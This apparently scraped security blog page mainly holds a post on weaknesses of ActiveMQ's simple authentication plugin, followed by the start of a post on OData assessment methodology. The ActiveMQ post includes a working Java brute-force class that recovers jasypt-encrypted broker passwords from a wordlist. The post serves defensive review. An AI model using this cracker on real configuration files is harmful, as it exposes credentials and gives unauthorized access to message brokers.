<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Cross-domain policy file usage recommendations for Flash Player </span><a href="http://www.adobe.com/devnet/flashplayer/articles/cross_domain_policy.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.adobe.com/devnet/flashplayer/articles/cross_domain_policy.html</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Adobe Flash Player 9 Security [PDF] </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><a href="http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/devnet/flashplayer/pdfs/flash_player_9_security.pdf" style="text-decoration: none;">http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/devnet/flashplayer/pdfs/flash_player_9_security.pdf</a></span><a href="http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/devnet/flashplayer/pdfs/flash_player_9_security.pdf"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></a><br />
<br /></div>
</li>
</ol>
</div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com16tag:blogger.com,1999:blog-4663432300421783651.post-24082686148391124672013-08-15T06:00:00.000-07:002013-08-23T21:59:13.543-07:00Security Considerations for ActiveMQ's Simple Authentication Plugin<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="WhitePaperBodycopy">
Apache ActiveMQ is a popular message broker that
has several security features to help secure its deployment. User or client authentication
typically a very important security requirement for enterprise applications and
ActiveMQ offers two plugin based authentication mechanisms that need to be
explicitly enabled and sometimes even coded based on your requirements.</div>
<br />
<span style="font-size: large;">ActiveMQ's Simple Authentication Plugin</span><br />
<div class="WhitePaperBodycopy">
In this blog post we will discuss ActiveMQ’s simple
authentication plugin and analyze it from security perspective. ActiveMQ’s
simple authentication plugin can be enabled by adding the <span style="font-family: "Courier New"; mso-bidi-font-family: "Times New Roman";">simpleAuthenticationPlugin</span>
element to the broker configuration with the required user credentials as show
in the image below.</div>
<div class="WhitePaperBodycopy">
<br /></div>
<div class="WhitePaperBodycopy">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE_nmXpPY2FdxItlXN6WxQ2HDRu1Afn2y9XZ7xt0vU2tr2LoEXwCLy95ZugvZ_59m-UXq4gup30jHjfnAI85_u0LKcQ7T5xcRZK6eBZ9_exXc6VGIaqEXNZ2ywXpAtlK92TMgv9sXrs6s9/s1600/simpleAuthentication.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE_nmXpPY2FdxItlXN6WxQ2HDRu1Afn2y9XZ7xt0vU2tr2LoEXwCLy95ZugvZ_59m-UXq4gup30jHjfnAI85_u0LKcQ7T5xcRZK6eBZ9_exXc6VGIaqEXNZ2ywXpAtlK92TMgv9sXrs6s9/s400/simpleAuthentication.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image shows ActiveMQ's simpleAuthenticationPlugin</td></tr>
</tbody></table>
<div>
The above configuration has two users, admin and general, assigned to two different groups, admins and general respectively.</div>
<div>
<br /></div>
<div>
Now that we have seen the sample <span style="font-family: Courier New, Courier, monospace;">simpleAuthenticationPlugin </span>configuration, following are the important security considerations of using this plugin.</div>
<div>
<ol style="text-align: left;">
<li>It stores usernames and passwords in clear in the configuration files. Access to configuration file can therefore reveal user credentials to unauthorized users. For example, a backup administrator may not be the right person to know broker credentials. However, he will be able to view those if <span style="font-family: Courier New, Courier, monospace;">simpleAuthenticationPlugin </span>is used in this fashion.</li>
<li>It does not offer any protection against password bruteforce attacks. That is, there is no provision to enforce account lockout on multiple failed login attempts. This can be devastating if someone is able to bruteforce your admin password and then read all messages passing through the broker and even administer the broker.</li>
</ol>
</div>
<div>
Out of the two points discussed above, ActiveMQ tries to address item 1 by providing a capability that can be used to encrypt broker passwords using the password based encryption scheme before storing the passwords inside the configuration files. The password encryption scheme is based off the open source <span style="font-family: Courier New, Courier, monospace;"><a href="http://www.jasypt.org/" target="_blank">jasypt</a></span> library’s <span style="font-family: Courier New, Courier, monospace;">StandardPBEStringEncryptor</span> class. The image below shows the encrypted passwords for two ActiveMQ users.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1EbFxVxVpKlX0fm7-ht2Y_zbOfAhQKLYQiZoc6wEtsy06R73YsVla4_ilnoEHOl8QWFfY3CexotPOGBfj25qukkMWQmbcCmBtwiVD30pZhIjId5ff6KcuayHLGzE32GxXFdUoh32C3AP8/s1600/activemq-encrypted-passwords.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1EbFxVxVpKlX0fm7-ht2Y_zbOfAhQKLYQiZoc6wEtsy06R73YsVla4_ilnoEHOl8QWFfY3CexotPOGBfj25qukkMWQmbcCmBtwiVD30pZhIjId5ff6KcuayHLGzE32GxXFdUoh32C3AP8/s400/activemq-encrypted-passwords.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">ActiveMQ's encrypted passwords<br />
<br />
<div style="text-align: left;">
<b><span style="font-size: large;"><br /></span></b>
<span style="font-size: large;">Decrypting ActiveMQ Passwords</span><br />
<span style="font-size: small;">Since the passwords are encrypted and not hashed, it is possible to obtain the correct password if the encryption string is available or if it can be bruteforced. So I wrote a Java Class (code below) to subject the encrypted <span style="font-family: inherit;">strings</span> to a bruteforce attack from a wordlist which also contained the correct password. It took 240 seconds for 1,000,000 (1 million) decryption attempts at the rate of 4,166 unique passwords per second on a single thread and a single core. Impressive, isn’t it? </span></div>
<div style="text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div style="text-align: left;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_JUlPmYlxFWD2XkLxD6AC96SsfG0bMGThtMkOaaFS78_exj0c8ivVMppNZ57lxDViGOb7R9B6ZsVb5grgugxExMPSeCfGp7TneAx3-g82zf4W-kNh1LSe56NSX1M19FebTHYxJE7b_Nih/s1600/password-decrypted.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_JUlPmYlxFWD2XkLxD6AC96SsfG0bMGThtMkOaaFS78_exj0c8ivVMppNZ57lxDViGOb7R9B6ZsVb5grgugxExMPSeCfGp7TneAx3-g82zf4W-kNh1LSe56NSX1M19FebTHYxJE7b_Nih/s400/password-decrypted.png" width="400" /></a></td></tr>
<tr><td class="tr-caption">Image shows successful password decryption with our custom class<br />
<br />
<br />
<div style="text-align: left;">
<span style="font-family: inherit; font-size: small;"><span style="line-height: 115%;">The
ActiveMQ binary can also be used to decrypt passwords from its configuration
files and we can also script it. However, that would require us to have
ActiveMQ binaries and may not as fast. Additionally, once a single password is
cracked, we can use the obtained key to decrypt the other ones. You can also
use <a href="https://github.com/OpenSecurityResearch/jmsdigger" target="_blank">JMSDigger</a> </span><span style="line-height: 115%; text-align: center;">to
perform batch password decryption.</span></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="text-align: center;"></span></div>
<span style="font-family: inherit;"><br /></span>
<br />
<div style="text-align: left;">
<span style="font-family: inherit; font-size: small;">Example code to perform ActiveMQ's password decryption</span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial; border-collapse: collapse; border: none; font-size: 13px;">
<tbody>
<tr>
<td style="border: dashed windowtext 1.0pt; mso-border-alt: dashed windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 6.65in;" valign="top" width="638"><div class="MsoNormal" style="margin: 12pt 0in 0.0001pt; text-align: left;">
<b><span style="color: #7f0055; font-family: Consolas;">import</span></b><span style="font-family: Consolas;"> java.io.FileInputStream;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<b><span style="color: #7f0055; font-family: Consolas;">import</span></b><span style="font-family: Consolas;"> java.io.FileNotFoundException;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<b><span style="color: #7f0055; font-family: Consolas;">import</span></b><span style="font-family: Consolas;"> java.util.Scanner;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<b><span style="color: #7f0055; font-family: Consolas;">import</span></b><span style="font-family: Consolas;">
org.jasypt.encryption.pbe.StandardPBEStringEncryptor;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<b><span style="color: #7f0055; font-family: Consolas;">import</span></b><span style="font-family: Consolas;">
org.jasypt.exceptions.EncryptionOperationNotPossibleException;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<b><span style="color: #7f0055; font-family: Consolas;">public</span></b><span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">class</span></b><span style="font-family: Consolas;"> AMQPasswordDecrypt {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">private</span></b><span style="font-family: Consolas;"> String </span><span style="color: #0000c0; font-family: Consolas;">encryptedText</span><span style="font-family: Consolas;">;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">private</span></b><span style="font-family: Consolas;"> StandardPBEStringEncryptor </span><span style="color: #0000c0; font-family: Consolas;">encryptor</span><span style="font-family: Consolas;">; </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">public</span></b><span style="font-family: Consolas;"> AMQPasswordDecrypt(String
encryptedText) {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">this</span></b><span style="font-family: Consolas;">.</span><span style="color: #0000c0; font-family: Consolas;">encryptedText</span><span style="font-family: Consolas;"> = encryptedText;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">this</span></b><span style="font-family: Consolas;">.</span><span style="color: #0000c0; font-family: Consolas;">encryptor</span><span style="font-family: Consolas;"> = </span><b><span style="color: #7f0055; font-family: Consolas;">new</span></b><span style="font-family: Consolas;"> StandardPBEStringEncryptor();</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> }</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">public</span></b><span style="font-family: Consolas;"> String decrypt(String
decryptionString) {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">try</span></b><span style="font-family: Consolas;"> {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="color: #0000c0; font-family: Consolas;">encryptor</span><span style="font-family: Consolas;"> = </span><b><span style="color: #7f0055; font-family: Consolas;">new</span></b><span style="font-family: Consolas;"> StandardPBEStringEncryptor();</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="color: #0000c0; font-family: Consolas;">encryptor</span><span style="font-family: Consolas;">.setPassword(decryptionString);</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">return</span></b><span style="font-family: Consolas;">(</span><span style="color: #0000c0; font-family: Consolas;">encryptor</span><span style="font-family: Consolas;">.decrypt(</span><span style="color: #0000c0; font-family: Consolas;">encryptedText</span><span style="font-family: Consolas;">));</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> } </span><b><span style="color: #7f0055; font-family: Consolas;">catch</span></b><span style="font-family: Consolas;">
(EncryptionOperationNotPossibleException ex) {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="color: #3f7f5f; font-family: Consolas;">//Absorb this and return null since <u>decrypt</u> operation
was not successful</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">return</span></b><span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">null</span></b><span style="font-family: Consolas;">;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> }</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> }</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">private</span></b><span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">static</span></b><span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">void</span></b><span style="font-family: Consolas;">
showHelpAndExit() {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> System.</span><i><span style="color: #0000c0; font-family: Consolas;">out</span></i><span style="font-family: Consolas;">.println(</span><span style="color: #2a00ff; font-family: Consolas;">"Run as: \njava -cp <Classpath> AMQPasswordDecrypt
\n\t<EncryptedActiveMQPassword>
<FilePathForDecryptionStrings>"</span><span style="font-family: Consolas;">);</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> System.<i>exit</i>(0);</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> }</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">public</span></b><span style="font-family: Consolas;"> String getEncryptedText() {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">return</span></b><span style="font-family: Consolas;"> </span><span style="color: #0000c0; font-family: Consolas;">encryptedText</span><span style="font-family: Consolas;">;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> }</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">public</span></b><span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">static</span></b><span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">void</span></b><span style="font-family: Consolas;">
main(String... args) </span><b><span style="color: #7f0055; font-family: Consolas;">throws</span></b><span style="font-family: Consolas;"> FileNotFoundException {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">if</span></b><span style="font-family: Consolas;">(args.</span><span style="color: #0000c0; font-family: Consolas;">length</span><span style="font-family: Consolas;"> != 2)</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> <i>showHelpAndExit</i>();</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">for</span></b><span style="font-family: Consolas;">(String arg: args) {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">if</span></b><span style="font-family: Consolas;">(arg.equals(</span><span style="color: #2a00ff; font-family: Consolas;">"-h"</span><span style="font-family: Consolas;">) || arg.equals(</span><span style="color: #2a00ff; font-family: Consolas;">"--h"</span><span style="font-family: Consolas;">) || arg.equals(</span><span style="color: #2a00ff; font-family: Consolas;">"--help"</span><span style="font-family: Consolas;">))</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> <i>showHelpAndExit</i>();</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> }</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> AMQPasswordDecrypt
brute = </span><b><span style="color: #7f0055; font-family: Consolas;">new</span></b><span style="font-family: Consolas;">
AMQPasswordDecrypt(args[0]);</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> Scanner in = </span><b><span style="color: #7f0055; font-family: Consolas;">new</span></b><span style="font-family: Consolas;"> Scanner(</span><b><span style="color: #7f0055; font-family: Consolas;">new</span></b><span style="font-family: Consolas;"> FileInputStream(args[1]));</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> String
decryptionString = </span><span style="color: #2a00ff; font-family: Consolas;">""</span><span style="font-family: Consolas;">;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> String
decryptedPassword = </span><b><span style="color: #7f0055; font-family: Consolas;">null</span></b><span style="font-family: Consolas;">;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">while</span></b><span style="font-family: Consolas;">(in.hasNextLine()) {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> decryptionString
= in.nextLine();</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> System.</span><i><span style="color: #0000c0; font-family: Consolas;">out</span></i><span style="font-family: Consolas;">.printf(</span><span style="color: #2a00ff; font-family: Consolas;">"Trying to decrypt %s with %s\n"</span><span style="font-family: Consolas;">, brute.getEncryptedText(), decryptionString);</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">if</span></b><span style="font-family: Consolas;">((decryptedPassword =
brute.decrypt(decryptionString) ) != </span><b><span style="color: #7f0055; font-family: Consolas;">null</span></b><span style="font-family: Consolas;">)</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">break</span></b><span style="font-family: Consolas;">;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> }</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">if</span></b><span style="font-family: Consolas;">(decryptedPassword != </span><b><span style="color: #7f0055; font-family: Consolas;">null</span></b><span style="font-family: Consolas;">)</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> System.</span><i><span style="color: #0000c0; font-family: Consolas;">out</span></i><span style="font-family: Consolas;">.printf(</span><span style="color: #2a00ff; font-family: Consolas;">"Encrypted password = %s, Decrypted password = %s,
Decryption String = %s"</span><span style="font-family: Consolas;">, brute.getEncryptedText(),
decryptedPassword, decryptionString);</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">else</span></b><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> System.</span><i><span style="color: #0000c0; font-family: Consolas;">out</span></i><span style="font-family: Consolas;">.printf(</span><span style="color: #2a00ff; font-family: Consolas;">"%s could not be decrypted"</span><span style="font-family: Consolas;">, brute.getEncryptedText());</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> in.close();</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> }</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 10pt; text-align: left;">
<span style="font-family: Consolas;">}</span><span style="font-family: Consolas; font-size: 9.0pt; mso-bidi-font-size: 10.0pt;"><o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
</td></tr>
</tbody></table>
</div>
</td></tr>
</tbody></table>
<div>
<span style="font-size: large; line-height: 17px;">Conclusion</span><br />
<span style="line-height: 17px;"><span style="text-align: center;">To summarize, if you are using ActiveMQ broker for business critical processes, you may want to use the </span><span style="font-family: Courier New, Courier, monospace; text-align: center;">simpleAuthenticationPlugin </span><span style="text-align: center;">only for PoC or initial testing as it may not offer the level of security your environment needs. Consider implementing custom JAAS (Java Authentication and Authorization Service) authentication plugin for better security. </span></span><br />
<span style="line-height: 17px;"><span style="text-align: center;"><br /></span></span>
<span style="line-height: 17px;">We will also have a blog post on writing </span><a href="http://en.wikipedia.org/wiki/Java_Authentication_and_Authorization_Service" style="line-height: 17px;" target="_blank">JAAS</a><span style="line-height: 17px;"> based authentication plugin for ActiveMQ in near future. Stay tuned!</span></div>
<o:p></o:p></div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com1tag:blogger.com,1999:blog-4663432300421783651.post-7087378659541040742013-02-27T06:50:00.001-08:002013-02-27T06:50:32.502-08:00Evaluating OData Applications<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
I was recently evaluating a SaaS provider's <a href="http://www.odata.org/" target="_blank">OData</a> application, evaluating how its endpoint client application communicated via OData to its backed servers. The client application allowed SaaS consumers to schedule critical computation functions, download the results, and perform additional actions using OData’s RESTful operations.<br />
<br />
This blog post aims provide an overview of the OData assessment methodology and also discusses a few interesting findings identified with respect to the specific OData implementation tested.<br />
<br />
<br />
<b><span style="font-size: large;">Understanding Our Target</span></b><br />
The first step of any assessment is gain an understanding of how the application functions. Particularly with OData applications, you’ll want to explore all available functionality, monitor its communication using Fiddler, then map out the RESTful operations and the URIs accessed for all the available functionality. Once this is done, you should have an understanding of the application as well as its OData requests and responses. The specific application we were targeting only had one user role so we could test only for horizontal privilege escalation if the Service Metadata Document review did not reveal additional functionality or features.<br />
<br />
Looking at the RESTful operations you should be able to determine the Service Root URI and the Service Metadata Document URI. For the application we were targeting, we leveraged these new URIs to perform the following:<br />
<br />
<br />
<ol style="text-align: left;">
<li>We accessed the Service Root URI and it showed several Feeds that were never referred by the thick client. A win? Not until we are able to really access real data.</li>
<li>Next we used Oyedata to perform automated analysis of the OData service (Service Metadata Document) and then exported the fuzzing templates to a text file to be used with the Burp suite for testing. The target OData service did not support JSON format and Oyedata’s ability to generate fuzzing templates in both JSON and XML formats came in as a life saver.</li>
<li>We also downloaded the Service Metadata Document locally for manual analysis.</li>
</ol>
As a result of all of these steps we discovered several additional Feeds and functionalities that the thick client did not use. Interesting, huh? Let’s move on to the assessment phase.<br />
<br />
<br />
<span style="font-size: large;">Oyedata</span><br />
